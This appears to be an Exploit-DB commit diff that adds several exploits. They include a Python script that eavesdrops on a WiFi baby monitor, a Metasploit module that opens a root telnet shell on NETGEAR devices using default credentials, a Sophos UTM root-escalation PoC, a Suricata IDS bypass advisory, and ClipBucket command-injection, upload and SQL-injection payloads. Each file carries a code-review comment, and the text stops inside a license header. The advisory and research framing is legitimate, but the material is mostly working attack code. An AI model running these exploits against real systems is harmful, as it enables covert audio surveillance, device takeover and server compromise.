DB: 2018-03-06

12 changes to exploits/shellcodes

Suricata < 4.0.4 - IDS Detection Bypass
ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions
Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit
Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow
Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation
Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record
NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)

Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)

Parallels Remote Application Server 15.5 - Path Traversal
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection
Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download
Offensive Security 2018-03-06 05:01:50 +00:00
parent aee073fb7e
commit 6a017b10c8
11 changed files with 1617 additions and 2 deletions


@ -0,0 +1,166 @@
Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function.
Monitoring the traffic using Wireshark during the pairing process revealed:
- The initial connection is made on port 8257
- To start the pairing process, the same sequence is sent each time
- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted
- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session
- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second)
## Abusing The Protocol to Record Audio
With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion.
The [very hacky] proof of concept code can be found below:
```
import socket
import sys
import time
if len(sys.argv) < 2:
print "Usage: python {file} target_ip [port]".format(file = sys.argv[0])
exit(1)
target = sys.argv[1]
port = 8257
if len(sys.argv) == 3:
port = int(sys.argv[2])
s = socket.socket()
s.connect((target, port))
s.send('\x01')
s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' +
'\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' +
'\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' +
'\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' +
'\x33')
heartbeat_dump = open('dump.heartbeat.bin', 'wb')
data_dump = open('dump.data.bin', 'wb')
has_data_socket = False
data_socket = socket.socket()
delta = 0
while True:
time.sleep(1)
data = s.recv(2048)
if data is not None:
heartbeat_dump.write(data)
print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data))
s.send('\x01')
if has_data_socket:
data = data_socket.recv(2048)
if data is not None:
data_dump.write(data)
print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data))
data_socket.send('\x01')
else:
print '[*] Establishing data connection'
data_socket.connect((target, 8258))
data_socket.send('\x01')
data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30')
has_data_socket = True
print '[*] Established data connection'
delta += 1
heartbeat_dump.close
data_dump.close
```
This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin.
Replaying the Recordings
In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application:
```
import socket
import sys
import time
s = socket.socket()
s.bind(('0.0.0.0', 8257))
s.listen(5)
print '[*] Heartbeat socket listening on port 8257'
data_socket = socket.socket()
data_socket.bind(('0.0.0.0', 8258))
data_socket.listen(5)
print '[*] Data socket listening on port 8258'
data = ''
with open('dump.heartbeat.bin', 'r') as replay_file:
data = replay_file.read()
wav_data = ''
with open('dump.data.bin', 'r') as wav_file:
wav_data = wav_file.read()
c, addr = s.accept()
print '[*] Connection from {client}'.format(client = addr)
c.send(data)
data_connection, addr = data_socket.accept()
print '[*] Data connection from {client}'.format(client = addr)
data_connection.send(wav_data)
buf_start = 0
buf_end = wav_data.find('\x00\x00\x00\x01', 1)
buf = wav_data[buf_start:buf_end]
while buf is not None:
c.send('\x01')
print '[*] Sending {bytes} bytes'.format(bytes = len(buf))
data_connection.send(buf)
time.sleep(0.1)
if buf_end == -1 or buf_start == -1:
buf = None
else:
buf_start = buf_end
buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1)
if buf_end == -1:
buf = wav_data[buf_start:]
else:
buf = wav_data[buf_start:buf_end]
data_connection.close()
c.close()
print '[*] Connection closed'
```
A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below:
https://vimeo.com/258487598
## Solution
When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version.
To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this).
## CVE-ID
CVE-2018-7661
## CVSS Score
CVSS Base Score: 5.9
Impact Subscore: 4.2
Exploitability Subscore: 1.6
CVSS Temporal Score: 5.3
Overall CVSS Score: 5.3
Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C
## Disclosure Timeline
2018-02-11: Initial contact with vendor to make them aware of the attack vector
2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue
2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack
2018-02-16: Vendor begins roll-out process for the new update
2018-02-22: Roll-out process completed and version 2.02.2 made available to the public
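Review bot: the last two lines of the recording script, `heartbeat_dump.close` and `data_dump.close`, name the method without calling it, so neither dump file is ever explicitly closed; they are also unreachable, since the `while True` loop above them has no exit path, so the files are only flushed when the interpreter is killed. Smaller points: both scripts are Python 2 only (`print` statement, byte-string literals) and no shebang or note says so; the heading "Replaying the Recordings" lacks the `##` used by the other sections; and no exploit-db header block (title, author, date, version, CVE) appears at the top of the file. On the remediation side, the Solution section says updating to 2.02.2 is enough, while the timeline describes the fix as making the premium password/encryption features available in the free version, so it should state whether users must also enable those settings after updating.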

exploits/hardware/remote/44245.rb Executable file

@ -0,0 +1,242 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Capture
def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR TelnetEnable',
'Description' => %q{
This module sends a magic packet to a NETGEAR device to enable telnetd.
Upon successful connect, a root shell should be presented to the user.
},
'Author' => [
'Paul Gebheim', # Python PoC (TCP)
'insanid', # Python PoC (UDP)
'wvu', # Metasploit module
],
'References' => [
['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
['URL', 'https://github.com/insanid/netgear-telenetenable']
],
'DisclosureDate' => 'Oct 30 2009', # Python PoC (TCP)
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [
['Automatic (detect TCP or UDP)',
proto: :auto
],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(23),
OptString.new('MAC', [false, 'MAC address of device']),
OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [false, 'Password on device'])
])
end
def check
# Run through protocol detection
detect_proto
# This is a gamble, but it's the closest we can get
if @proto == :tcp
CheckCode::Detected
else
CheckCode::Unknown
end
end
def exploit
# Try to do the exploit unless telnetd is detected
@do_exploit = true
# Detect TCP or UDP and presence of telnetd
@proto = target[:proto]
detect_proto if @proto == :auto
# Use supplied or ARP-cached MAC address
configure_mac if @do_exploit
# Use supplied or default creds
configure_creds if @do_exploit
# Shell it
exploit_telnetenabled if @do_exploit
connect_telnetd
end
def detect_proto
begin
connect
res = begin
sock.get_once || ''
rescue EOFError
''
end
# telnetenabled returns no data, unlike telnetd
if res.length == 0
print_good('Detected telnetenabled on TCP')
else
print_good('Detected telnetd on TCP')
@do_exploit = false
end
@proto = :tcp
# It's UDP... and we may not get an ICMP error...
rescue Rex::ConnectionError
print_good('Detected telnetenabled on UDP')
@proto = :udp
ensure
disconnect
end
end
def configure_mac
@mac = datastore['MAC']
return if @mac
print_status('Attempting to discover MAC address via ARP')
begin
open_pcap
@mac = lookup_eth(rhost).first
rescue RuntimeError
fail_with(Failure::BadConfig, 'Superuser access required')
ensure
close_pcap
end
if @mac
print_good("Found MAC address #{@mac}")
else
fail_with(Failure::Unknown, 'Could not find MAC address')
end
end
def configure_creds
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]
# Try to use default creds if no creds were found
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end
print_good("Using creds #{@username}:#{@password}")
end
def exploit_telnetenabled
print_status('Generating magic packet')
payload = magic_packet(@mac, @username, @password)
begin
print_status("Connecting to telnetenabled via #{@proto.upcase}")
@proto == :tcp ? connect : connect_udp
print_status('Sending magic packet')
@proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
rescue Rex::ConnectionError
fail_with(Failure::Disconnected, 'Something happened mid-connection!')
ensure
print_status('Disconnecting from telnetenabled')
@proto == :tcp ? disconnect : disconnect_udp
end
# Wait a couple seconds for telnetd to come up
print_status('Waiting for telnetd')
sleep(2)
end
def connect_telnetd
print_status('Connecting to telnetd')
connect
handler(sock)
end
# NOTE: This is almost a verbatim copy of the Python PoC
def magic_packet(mac, username, password)
mac = mac.gsub(/[:-]/, '').upcase
if mac.length != 12
fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')
end
just_mac = mac.ljust(0x10, "\x00")
if username.length > 0x10
fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')
end
just_username = username.ljust(0x10, "\x00")
if @proto == :tcp
if password.length > 0x10
fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
end
just_password = password.ljust(0x10, "\x00")
elsif @proto == :udp
# Thanks to Roberto Frenna for the reserved field analysis
if password.length > 0x21
fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')
end
just_password = password.ljust(0x21, "\x00")
end
cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
md5_key = Rex::Text.md5_raw(cleartext)
payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00"))
secret_key = 'AMBIT_TELNET_ENABLE+' + password
byte_swap(blowfish_encrypt(secret_key, payload))
end
def blowfish_encrypt(secret_key, payload)
cipher = OpenSSL::Cipher.new('bf-ecb').encrypt
cipher.padding = 0
cipher.key_len = secret_key.length
cipher.key = secret_key
cipher.update(payload) + cipher.final
end
def byte_swap(data)
data.unpack('N*').pack('V*')
end
end
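Review bot: the `rescue Rex::ConnectionError` branch of `detect_proto` calls `print_good('Detected telnetenabled on UDP')` for any failed TCP connect, including a host that is down or filtered, so nothing has actually been detected at that point; a `print_status` saying that UDP is being assumed would match the `CheckCode::Unknown` that `check` already returns for this case, and the comment "we may not get an ICMP error" already concedes the uncertainty. Two smaller points in `magic_packet`: the message `'MAC must be 12 bytes without : or -'` describes 12 hex characters (6 bytes), and `print_good("Using creds #{@username}:#{@password}")` in `configure_creds` writes the password into the console and any session logs, where the username alone would do.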


@ -0,0 +1,183 @@
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service
Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
Advisory ID: KL-001-2018-007
Publication Date: 2018.03.02
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt
1. Vulnerability Details
Affected Vendor: Sophos
Affected Product: UTM 9
Affected Version: 9.410
Platform: Embedded Linux
CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
Impact: Privilege Escalation
Attack vector: SSH
2. Vulnerability Description
The attacker must know the password for the loginuser
account. The confd client is not available to the loginuser
account. However, the running service is accessible over
a network port on the loopback interface. By replaying the
network traffic required to obtain a SID from this service it
is possible to escalate privileges to root.
3. Technical Description
1. Obtain the a privileged session token
$ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
loginuser@1.3.3.7's password:
$ python kl-loginuser-confd-priv_esc.py
pojiZSqWEUAUDNIQtSop
2. Using that session token, set the root password
POST /webadmin.plx HTTP/1.1
Host: 1.3.3.7:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Referer: https://1.3.3.7:4444/
Content-Length: 422
Cookie: SID=pojiZSqWEUAUDNIQtSop
DNT: 1
Connection: close
{"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1":
"loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser":
"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":
"1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:33:53 GMT
Server: Apache
Expires: Thursday, 01-Jan-1970 00:00:01 GMT
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Option: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 178895
{"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]
3. Look for success message.
"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]
4. Profit.
loginuser@[redacted]:/home/login > su
Password:
[redacted]:/home/login # id
uid=0(root) gid=0(root) groups=0(root),890(xorp)
4. Mitigation and Remediation Recommendation
The vendor has addressed this vulnerability in version
9.508. Release notes and download instructions can be found at:
https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2017.07.21 - KoreLogic submits vulnerability details to Sophos.
2017.07.21 - Sophos acknowledges receipt.
2017.09.01 - 30 business days have elapsed since the vulnerability
was reported to Sophos.
2017.09.15 - KoreLogic requests an update on the status of this and
other vulnerabilities reported to Sophos.
2017.09.18 - Sophos informs KoreLogic that this issue will require
additional engineering and requests an extension of
the disclosure timeline.
2017.09.25 - 45 business days have elapsed since the vulnerability
was reported to Sophos.
2017.11.07 - 75 business days have elapsed since the vulnerability
was reported to Sophos.
2017.12.14 - 100 business days have elapsed since the vulnerability
was reported to Sophos.
2018.01.12 - KoreLogic requests an update from Sophos.
2018.01.15 - Sophos informs KoreLogic that the expected release date
for the UTM 9.5 MR 6 version containing the mitigation
is the middle of February.
2018.01.16 - 120 business days have elapsed since the vulnerability
was reported to Sophos.
2018.02.28 - 150 business days have elapsed since the vulnerability
was reported to Sophos.
2018.03.01 - UTM 9.508 released by Sophos.
2018.03.02 - KoreLogic public disclosure.
7. Proof of Concept
from socket import socket,AF_INET,SOCK_STREAM
class Exploit:
def __init__(self):
self.host = '127.0.0.1'
self.port = 4472
self.connected = False
self.s = None
return None
def disconnect(self):
self.s.close()
return True
def send_trigger(self):
packet_one =
'00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')
self.s.send(packet_one)
self.s.recv(4096)
packet_two =
'00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')
self.s.send(packet_two)
self.s.recv(4096)
packet_three =
'0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')
self.s.send(packet_three)
print self.s.recv(4096).strip()
return True
def connect(self):
self.s = socket(AF_INET, SOCK_STREAM)
self.s.connect((self.host,self.port))
self.connected = True
return True
def run(self):
self.connect()
self.send_trigger()
self.disconnect()
return True
if __name__=="__main__":
Exploit().run()
The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
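Review bot: the proof of concept in section 7 does not parse as written: `packet_one =`, `packet_two =` and `packet_three =` each end their line with the hex string literal on the following line, so Python raises a SyntaxError at the first assignment; the literal must be on the same line or the assignment wrapped in parentheses. The script is also Python 2 only (`.decode('hex')`, `print` statement) with no shebang saying so, and the file carries no exploit-db header block. Step 1 of the technical description is worth cross-referencing from section 4: the confd port is reached through an SSH forward to 127.0.0.1:4472, which is what limits the issue to accounts that already have shell access, as section 2 states.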


@ -0,0 +1,57 @@
-----------------------------------------------------
Vulnerability Type: Detection Bypass
Affected Product: Suricata
Vulnerable version: <4.0.4
CVE number: CVE-2018-6794
Found: 25.01.2018
By: Kirill Shipulin (@kirill_wow), Positive Technologies
Severity: Medium
------------------------------------------
About Suricata:
---------------
Suricata is a high performance Network Threat Detection, IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF, its supporting vendors and the community
Attack Description:
-------------------
If as a server side you break a normal TCP 3 way handshake packets order and inject some response data before 3whs is complete then data still will be received by the a client but some IDS engines may skip content checks on that.
Attack scenario TCP flow scheme:
Client -> [SYN] [Seq=0 Ack= 0] -> Evil Server
Client <- [SYN, ACK] [Seq=0 Ack= 1] <- Evil Server
Client <- [PSH, ACK] [Seq=1 Ack= 1] <- Evil Server # Injection before the 3whs is completed
Client <- [FIN, ACK] [Seq=83 Ack= 1] <- Evil Server
Client -> [ACK] [Seq=1 Ack= 84] -> Evil Server
Client -> [PSH, ACK] [Seq=1 Ack= 84] -> Evil Server
IDS signature checks for tcp stream or http response body will be skipped in the case of data injection. This attack technique requires all three packets from a malicious server to be received by a client side together before it completes 3whs. Proof of concept server was written in C to reproduce this and it works reliably in local networks. Since some network devices may affect packets transmission exploitation is not so reliable for the internet scenario.
This attack possibly may impact other network monitoring or intrusion detection systems because is not limited to Suricata IDS: an old Snort IDS version 2.9.4 is also affected.
Successful exploitation leads to a complete TCP-Stream response or HTTP response signatures bypass and may be used to prevent malicious payloads from network detection.
PoС:
----
A Working PoC server is available here: https://github.com/kirillwow/ids_bypass
There is also a traffic capture of this data injection technique.
Timeline Summary:
-----------------
2018-01-25: Issue submitted to the bug tracker.
2018-01-30: Patch ready.
2018-02-14: Suricata 4.0.4 containing the fix has been released.
References:
-----------
CVE-2018-6794
https://redmine.openinfosecfoundation.org/issues/2427
Contacts:
---------
Twitter: https://twitter.com/AttackDetection
Twitter: https://twitter.com/kirill_wow
Telegram: https://t.me/kirill_wow
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44247.zip
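Review bot: the statement that "an old Snort IDS version 2.9.4 is also affected" is given without a reference or a note on whether current Snort releases were tested, unlike the Suricata issue, which cites redmine issue 2427; either cite the test or mark it as untested. The Attack Description also has several wording slips ("received by the a client", "then data still will be received", "because is not limited to Suricata IDS"), and the section label "PoС:" does not match the later "Proof of Concept:"; a consistency pass would help. The file also carries no exploit-db header block, and the only local artifact is the linked 44247.zip.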


@ -0,0 +1,245 @@
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
=======================================================================
title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
vulnerable version: <4.0.0 - Release 4902
fixed version: 4.0.0 - Release 4902
CVE number: -
impact: critical
homepage: http://clipbucket.com/
found: 2017-09-06
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."
Source: https://clipbucket.com/about
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.
Users are advised to immediately install the patched version provided by the
vendor.
Vulnerability overview/description:
-----------------------------------
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.
2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.
3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.
Proof of concept:
-----------------
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:
$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<<COMMAND HERE>>"
http://$HOST/api/file_uploader.php
Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:
$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
|| <<COMMAND HERE>>" "http://$HOST/actions/file_downloader.php"
2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php"
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php"
Furthermore, this vulnerability is also available to authenticated users with
basic privileges:
$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg"
3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.
URL : http://$HOST/actions/vote_channel.php
METHOD : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())
The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1
WHERE userid = {$userid}";
}else{
//$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =
{$userid}";
$sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =
{$userid}";
$result = $db->Execute($sel);
foreach ($result as $row )
$current_likes = $row['likes'];
$decremented_like = $current_likes-1;
$query = "Update ".tbl("users")." Set likes = $decremented_like Where userid
= $userid";
}
[...]
URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=emailExists&email=1' or '1'='1
The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$email = $_POST['email'];
$check = $db->select(tbl('users'),"email"," email='$email'");
if (!$check) {
echo "NO";
}
[...]
URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=userExists&username=1' or '1'='1
The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$username = $_POST['username'];
$check = $db->select(tbl('users'),"username"," username='$username'");
if (!$check) {
echo "NO";
}
[...]
Vulnerable / tested versions:
-----------------------------
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
the latest at the time the security vulnerabilities were discovered.
Vendor contact timeline:
------------------------
2017-10-17: Contacting vendor through email.
2017-10-18: Vendor asking for additional details.
2017-10-19: Replied to vendor.
2017-10-26: Request update from vendor, no response.
2017-11-09: Request update from vendor.
2017-11-09: Vendor response with security patches.
2017-11-10: Notified vendor the security patches don't fix the reported issues
2017-11-30: Request update from vendor.
2017-11-30: Vendor requesting for support via Skype
2017-12-07: Response to vendor.
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
2018-01-22: Vendor provides latest patches, scheduled for future release
2018-01-26: Verified that the patches don't fully mitigate all issues.
2018-01-29: Request update from vendor, no response.
2018-02-06: Request update from vendor, no response.
2018-02-08: Informing vendor of public release date
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
two weeks; postponing once again for two weeks
2018-02-23: Request update from vendor.
2018-02-26: Vendor publishes v4.0
2018-02-27: Public release of security advisory
Solution:
---------
The vendor provided the following patched version:
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
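Review bot: the PAYLOAD line for /actions/vote_channel.php repeats the parameter name ("channelId=channelId=1-BENCHMARK(100000000, rand())"), which reads like a copy error given that the other two PAYLOAD lines each carry a single parameter. Version labelling is ambiguous as well: "vulnerable version: <4.0.0 - Release 4902" and "fixed version: 4.0.0 - Release 4902" are distinguished only by the release number, yet "Vulnerable / tested versions" says "version 4.0.0 have been tested" without one, so the release number of the 4.0.0 build that was found vulnerable should be stated. In the vote_channel.php excerpt, the commented-out `//if($userquery->login_check('',true)){` is what makes the issue unauthenticated, and `$userid` is interpolated unquoted into both the UPDATE and the SELECT; naming that root cause next to the Solution (prepared statements and a restored login check) would let readers verify that release 4902 fixes the cause rather than the reported symptom.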

exploits/php/webapps/44252.py Executable file

@ -0,0 +1,265 @@
#!/usr/bin/python2
# -*- coding:utf-8 -*-
'''
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
